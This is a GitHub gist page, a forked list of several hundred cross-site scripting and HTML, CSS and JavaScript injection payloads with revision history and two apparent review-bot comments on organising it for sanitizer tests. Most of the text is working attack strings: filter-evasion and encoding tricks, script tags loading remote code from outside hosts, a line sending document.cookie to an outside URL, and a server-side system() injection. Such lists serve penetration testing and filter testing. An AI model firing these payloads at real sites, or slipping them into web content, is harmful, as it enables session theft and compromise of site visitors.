Forked from xsscx/XSS, Cross Site Scripting, Javascript, Meta, HTML Injection Signatures
Created
March 22, 2018 02:33
Revisions
-
xsscx renamed this gist
Jan 31, 2015 . 1 changed file with 0 additions and 0 deletions.
File renamed without changes. -
xsscx revised this gist
Jan 31, 2015 . No changes.
-
xsscx revised this gist
Jan 31, 2015 . 1 changed file with 20 additions and 1 deletion.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1180,5 +1180,24 @@ top[630038579..toString(30)](1) Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; while(1){} location='javascript:1+{}' width:expression(if(!window.done)alert(1),window.done=1) expression(window.x?0:(confirm(7),window.x=1)) background-image:url(https://s1.yimg.com/rz/l/yahoo_en-US_b_w_26x14_2x.png) behaviour:url\0028javascript:confirm\0028[0][0]\0029\0029 /*@cc_on @if(1)confirm(1)@end }*{color:#ccc;} "; ||confirm('XSS') || " <// style=x:expression\28write(1)\29> <STYLE TYPE="text/javascript">confirm(document.location);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A> <STYLE>@import'http://xss.cx/xss.css';</STYLE> <XSS STYLE="xss:expression(confirm(document.location))"> <meta charset=iso-2022-jp>%1B(B%1B><svg onload=alert(1)>%1B$B%1B %20~}%22%3Cmeta%20charset=hz-gb-2312%3E%3Csvg%20onload%3Dalert%281%29%3E~{ %3Cmeta%20charset=iso-2022-jp%3E%1B(J+onfocus=alert(1)%20autofocus%3E%1B$(D%1B( %3Cmeta+charset%3Dhz-gb-2312%3E%27~%7B%27%3C~%7D%22%20onmouseover=alert%281%29%20a= %3Cmeta%20charset=hz-gb-2312%3E~{!~}%22%20onfocus=alert%281%29%20autofocus%3E %1B%28J%3Cmeta%20charset%3Diso-2022-jp%3E%3Cbody%20onload=alert%281%29%3E%1B%24%40%1B /* RFI STOP */ -
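Review bot: Several entries added in this hunk appear to repeat entries already in the file: the five `<STYLE …>` lines and `"; ||confirm('XSS') || "` are also present in the initial revision's content. Duplicates lengthen every filter or sanitizer regression run built from this list without adding coverage, so either drop them or mark the repetition as deliberate with a header in the file's own comment style, e.g. `/* CSS and charset context; STYLE entries repeated from the HTML section on purpose */`. The `@import` and `-moz-binding` entries, and the `background-image:url(...)` line, reference live third-party hosts, so the header should also note that a harness replaying the list must run with outbound network access blocked. Which lines are context and which are additions is not fully recoverable from this rendering, so the duplicate count should be confirmed against the raw file.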
xsscx revised this gist
Jan 31, 2015 . 1 changed file with 212 additions and 0 deletions.
@@ -969,4 +969,216 @@ data:text/html<svg/onload=parentNode.parentNode.parentNode[/locatio/.source+/n/. <script>[{get[alert(1)]()false}]</script> <script>a = {get[alert`1`](){}}</script> <svg><a xyz:href=123><text>test</text></svg> '() {' document.createElement('img').src='javascript:while(1){}' '<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' (function(a){alert(1)}).call() {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} p'rompt(1) "(prompt(1))in" parseInt("prompt",36); eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) eval(1558153217..toString(36))(1) eval(630038579..toString(30))(1) eval(0x258da033.toString(30))(1) for((i)in(self))eval(i)(1) {"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}} //prompt.ml%2f@ᄒ.ws/✌ //prompt.ml%2f@⒕₨ javascript:prompt(1)#{"action":1} vbscript:prompt(1)#{"action":1} window.location.assign("http://xss.cx") window.name='a\x01b' window.name='hacked';location.replace('about:blank'); window.name="javascript:confirm((window.opener||window).document.cookie);"; window.open("http://xss.cx","confirm(document.domain);", "", false); vbscr	ipt:confirm(1)" vbscript:confirm(1); vbscript:confirm(1); {{{}.toString.constructor('confirm(1)')()}} try{confirm(document.domain)}catch(e){location.reload()} \u003C \u003E \u003c \u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e \u003e \u0061lert(1) \u0061\u006c\u0065\u0072\u0074 \u0061\u006c\u0065\u0072\u0074(1) %ufflcxss%2f%uffle this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com” throw delete~typeof~confirm(1)/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== data:text/html,<script>confirm(0);confirm(1);location.reload();</script> .__defineGetter__.constructor('[].constructor. 
defineSetter('x',confirm); x=1; delete [a=confirm],delete a(1) delete confirm(1) delete~[a=confirm]/delete a(1) var a=0; ((a == 1) ? 2 : confirm(1));// null%22%20style%3d%22background%3aexpression%28confirm%282727%29 ";document.body.addEventListener("DOMActivate",confirm(1))// delete~[a=confirm]/delete a(1) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); javascript:confirm&lpar1&rpar " onfocus="write(unescape('<')+'script src='+unescape('"http://') ' onmouseover=confirm(document.location) (0)['constructor']['constructor']("\141\154\145\162\164(1)")(); {1+1,confirm(8)} <blink/ onmouseover=prompt(1)>OnMouseOver ({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ 12345 /\51')() 1/confirm(1) "1\"&confirm(1)\"3" >%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>'%uff1cscript%uff1econfirm('XSS')%uff1c/script%uff1e'">>"'';!--"<XSS>=&{()} \%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}// '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E \%22;confirm(1);// \%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)// Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm ExternalInterface.call("document.write","<script>confirm(1)</script>"); ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); JaVaScRipT:confirm(1) String.fromCharCode(0xffff+0x3d) (String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41)) [U+2028]confirm(1) '-/"/-confirm(1)//' +confirm(1) +confirm(1)-- -confirm(1)- \";confirm(1);// “;confirm(1)// confirm(1)".replace(/.+/,eval)// confirm(1)>>>/xss '+confirm(9)&&null==' ';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//"; confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//-- 
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--</SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT> ';confirm(String.fromCharCode(88,83,83))//\';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//\";confirm(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{} \";confirm(document.location);// confirm(document.location) confirm(document.selection.createRange().getBookmark()) confirm(location.hostname) confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>')); confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click')); confirm(window.toStaticHTML('<marquee>foo</marquee>')); confirm(<xss>xs{[function::status]}s</xss>) %c0″//(0000%0dconfirm(1)// ;\"))}catch(e) {confirm(document.location);}// ;\\"))}catch(e) {confirm(document.location);}// \"));}catch(e){confirm(document.domain);}// \"));}catch(e){confirm(document.domain)}// \"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}// ";document.body.addEventListener("DOMActivate",confirm(1))// document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=confirm(1)>') "+document.cookie+" document.cookie='xss=xss;domain=.cx.' 
document.getElementsByName("login").item(0).src = http://xss.cx/ document.location="http://xss.cx/default.aspx?c=" + document.cookie '},document.location=window.name+'//'+ document.location=window.name+'//'+ document.location=window.name%2b%27//%27%2b document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase() document.write('<img src="<iframe/onload=confirm(1)>\0">') ";escape=eval;// eval(location.hash.slice(1)) eval(location.hash.slice(1))// ");eval(name+" "+eval(name)+" eval(name) eval('\\u'+'0061'+'lert(1)') getURL("javascript:confirm(document.location)") header('Refresh: 0;url=javascript:confirm(1)'); htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; if(1)confirm(1)}{ javaSCRIPT:confirm(1) javas	cript:\u0061lert(1); javascript:confirm(1) javascript:confirm(1) "javascript:confirm(0);", ;javascript:confirm(0); ;})javascript:confirm(0); javascript:confirm(0); javascript:confirm(1)// javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x "javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x" /"/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x javascript:\u0061lert(1) javascript:confirm(document.cookie) location='vbscript:alert(1)' 
(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src="x:x" onerror="if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}"> ';location='javascript://'%2Blocation.hash;' location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)' location='javascript:%61%6c%65%72%74%28%31%29' location=javascript:confirm(0);. ";location=name;// \nconfirm(1) navigateToURL(new URLRequest("Javascript: document.write(\"<script>confirm(1)</scr\"+\"ipt>\")"),"_self") new XMLHttpRequest().open("GET", "data:text/html,<svg onload=confirm(2)></svg>", false); ;onerror=confirm;throw 1; onerror=confirm;throw 1; onerror=confirm;throw 1; onerror=eval;throw'=confirm\x281\x29'; onerror=eval;throw'=confirm\x281\x29'; "onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a) onload=confirm(1)// prompt(0x0064) ;prompt(1)//”;prompt(2)//”;prompt(3)//–></SCRIPT>”>’><SCRIPT>prompt(4)</SCRIPT> "!=prompt(9)!=" "*prompt(9)*" "-prompt(9)-" "/prompt(9)/" "<<prompt(9)<<" "<=prompt(9)<=" "<prompt(9)<" "===prompt(9)===" "==prompt(9)==" ">=prompt(9)>=" ">>>prompt(9)>>>" ">>prompt(9)>>" ">prompt(9)>" "?prompt(9):" "^prompt(9)^" "|prompt(9)|" "||prompt(9)||" prompt(9) prompt(location.hash) prototype.join=function(){confirm("PWND:"+document.body.innerHTML)}')(); j
a
vas
cript:confirm(1); parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" prompt(1)-eval(JSON.parse(name).input) javascript:HTMLDocument.__proto__.__defineSetter__("prototype",function(){try{d.d.d}catch(e){confirm(e.stack)}}) confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````; '"()=<z> '"(){}[]; JaVAscRIPT:confirm(4) [XSS](javascript:confirm(6)) (javascript:window.onerror=confirm;throw%20document.cookie) 0\%22))}catch(e){confirm(2)}// Components.lookupMethod(self, 'confirm')(1) Data URl "; ||confirm('XSS') || " '';!--"<XSS>=&{()} '';!--"<XSS>=&{()} 5.replace(/XSS/g,confirm) ";a.b=c;// ";a[b]=c;// a="get"; $("button").val("<iframe src=vbscript:confirm(1)>") external.NavigateAndFind('http://xss.cx',[],[]) javascript	:alert(1) javascript<TAB>:alert(1) {{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}} ${@print(system(“dir”))} {{m=[({}).constructor.defineProperties];[[''.toString.constructor,{'constructor':{} }].reduce(m[0])];''.toString.constructor('alert(1)')()}} Function.prototype.toString=Function.prototype.call;"alert(1)//".replace("//",Function) top[630038579..toString(30)](1) */(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())'%3E%3C%%20style='x:expression/* \u{61}l\u{65}rt`1` Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; while(1){} location='javascript:1+{}' /* RFI STOP */ -
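Review bot: The 212 added entries mix several output contexts (bare JavaScript expressions, URL schemes, template expressions, percent-encoded strings) with no grouping or labels, so a sanitizer regression suite built from this file cannot tell which context a failing line was meant to exercise. The file already uses `/* … */` markers (`/* RFI START */`, `/* RFI STOP */`), so one header per group such as `/* context: URL scheme */` would fit its style. Entries like `while(1){}` never return, so a browser-based harness needs a per-case timeout; a marker such as `/* does not terminate: run with timeout */` next to them would make that explicit. Control characters are written three different ways in this hunk (a literal tab or newline, `<TAB>`, `[U+2028]`), and the literal ones are easily lost when the file is copied or rendered, as the hidden-Unicode banner on this page shows; choose one escaped notation and document it at the top of the file.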
xsscx created this gist
Jan 31, 2015 .
@@ -0,0 +1,972 @@ /* Remote File Include with HTML TAGS via XSS.Cx */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */ /* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */ /* Updated September 29, 2014 */ /* RFI START */ <img language=vbs src=<b onerror=alert#1/1#> <isindex action="javas	cript:alert(1)" type=image> "]<img src=1 onerror=alert(1)> <input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span> <svg[U+000B]onload=alert(1)> <iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}"> <cite><a href="javascript:confirm(1);">XSS cited!</a></cite> <svg/onload=window.onerror=alert;throw/XSS/;// <video src="x" onloadstart="alert(1)"> <a href="javascript:data:alert(1)">click</a> <a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a> <div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div> <%%%> <meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J <!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> --> <! XSS="><img src=xx:x onerror=confirm(1)//"> "; ||confirm('XSS') || " <? 
echo('<SCR)'; "/> <img src='aaa' onerror=confirm(document.domain)> /> <img src='aaa' onerror=confirm(document.domain)> <!-- --!><input value="--><body/onload=`confirm(4)//`"> <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a> //|\\ <script //|\\ src='http://xss.cx/xss.js'> //|\\ </script //|\\ < < > > < < > > < < > > < < > > �</form><input type="date" onfocus="confirm(1)"> < < > > %2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E %253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E %253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E %253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E "%25prompt(9)%25" "%26%26prompt(9)%26%26" %26lt%3bscript> "%26prompt(9)%26" %27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E <3 </3 "><h1/onmouseover='\u0061lert(1)'>%00 "><svg><style>{-o-link-source:'<body/onload=confirm(1)>' %3C %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E 
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E %3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E 
%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E %3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E %3E [4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//"> < < > > <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> <A """><IMG SRC="javascript:confirm(1)"> "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF <A/HREF="javascript:confirm(1)"> <B <SCRIPT>confirm(1)</SCRIPT>> <BASE HREF="javascript:confirm('XSS');//"> <BGSOUND SRC="javascript:confirm('XSS');"> <BODY BACKGROUND="javascript:confirm('XSS')"> <BODY ONLOAD=confirm('XSS')> <BR SIZE="&{confirm('XSS')}"> <B="<SCRIPT>confirm(1)</SCRIPT>"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="background-image: url(javascript:confirm(5))"> <DIV STYLE="width: expression(confirm(5));"> %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80 <FRAMESET><FRAME RC=""+"javascript:confirm(5);"></FRAMESET> <FRAMESET><FRAME SRC="javascript:confirm(5);"></FRAMESET> > > <HEAD><META 
HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4- <HTML><BODY> <IFRAME SRC="javascript:confirm(5);"></IFRAME> <IFRAME%20src='javascript:confirm%26%23x25;281)'> <![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>"> <IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF) <IMG DYNSRC="javascript:confirm(document.location)"> <IMG LOWSRC="javascript:confirm(document.location)"> <IMG SRC="  javascript:confirm(document.location);"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:confirm(document.location)> <IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")> <IMG SRC=JaVaScRiPt:prompt(document.location)> <IMG SRC="jav ascript:confirm(document.location);"> <IMG SRC=java%00script:confirm(document.location)> <IMG SRC=`javascript:confirm(1)`> <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))> <IMG SRC=`javascript:confirm(document.cookie)`> <IMG SRC="javascript:confirm(document.location)" <IMG SRC="javascript:confirm(document.location);"> <IMG SRC=javascript:confirm(document.location)> <IMG SRC=javascript:confirm("XSS")> <IMG SRC=javascript:prompt(document.location)> <IMG SRC="jav	ascript:confirm(<WBR>document.location);"> <IMG SRC="jav	ascript:confirm(document.location);"> <IMG SRC="jav
ascript:confirm(<WBR>document.location);"> <IMG SRC="jav
ascript:confirm(document.location);"> <IMG SRC="jav
ascript:confirm(<WBR>document.location);"> <IMG SRC="jav
ascript:confirm(document.location);"> <IMG SRC="livescript:[code]"> <IMG SRC="mocha:[code]"> <IMG SRC='vbscript:msgbox(document.location)'> <IMG SRC=javascript:alert('XSS')> <IMG STYLE="xss:expr/*XSS*/ession(confirm(document.location))"> <IMG onmouseover =confirm(1)> <IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a> <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')> <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')> <INPUT TYPE="IMAGE" SRC="javascript:confirm(document.location);"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="http://xss.cx/xss.css"> <LINK REL="stylesheet" HREF="javascript:confirm(document.location);"> < < <META HTTP-EQUIV="Link" Content="<http://xss.cx/xss.css>; REL=stylesheet"> <META HTTP-EQUIV="Link" Content="<javascript:confirm(document.location)>; REL=stylesheet"> <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>confirm(document.location)</SCRIPT>"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:confirm(document.location);"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:confirm(document.location);"> <OBJECT TYPE="text/x-scriptlet" DATA="http://xss.cx/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT> PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+ <S[0x00]CRIPT>confirm(1)</S[0x00]CRIPT> <SCR%00IPT>confirm(document.location)</SCR%00IPT> <SCRIPT SRC="http://xss.cx/xss.jpg"></SCRIPT> <SCRIPT SRC=http://xss.cx/xss.js?<B> <SCRIPT SRC=http://xss.cx/xss.js></SCRIPT> <SCRIPT a=">" '' SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT "a='>'" 
SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=">" SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># </SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT/XSS SRC="http://xss.cx/xss.js"></SCRIPT> <SCRIPT>a=document.cookie <SCRIPT>confirm(document.location);</SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.cx/xss.js"></SCRIPT> SRC=
<IMG 6;avascript:alert('XSS')> <STYLE TYPE="text/javascript">confirm(document.location);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:confirm(document.location)")}</STYLE> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>.XSS{background-image:url("javascript:confirm(document.location)");}</STYLE><A CLASS=XSS></A> <STYLE>@import'http://xss.cx/xss.css';</STYLE> "><STYLE>@import"javascript:confirm(document.location)";</STYLE> <STYLE>@im\port'\ja\vasc\ript:confirm(document.location)';</STYLE> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <TABLE BACKGROUND="javascript:confirm(document.location)"> < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > < < > > <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <a data-remote=true data-method=delete href=/delete_account>CLICK</a> <a href=````> <a href="#" onclick="confirm(' ');alert(2 ')">name</a> <a href='#' onmouseover ="javascript:$('a').html(5)">a link</a> <a href="// ͥ.ws">CLICK <a href=[0x0b]" onclick=confirm(1)//">click</a> 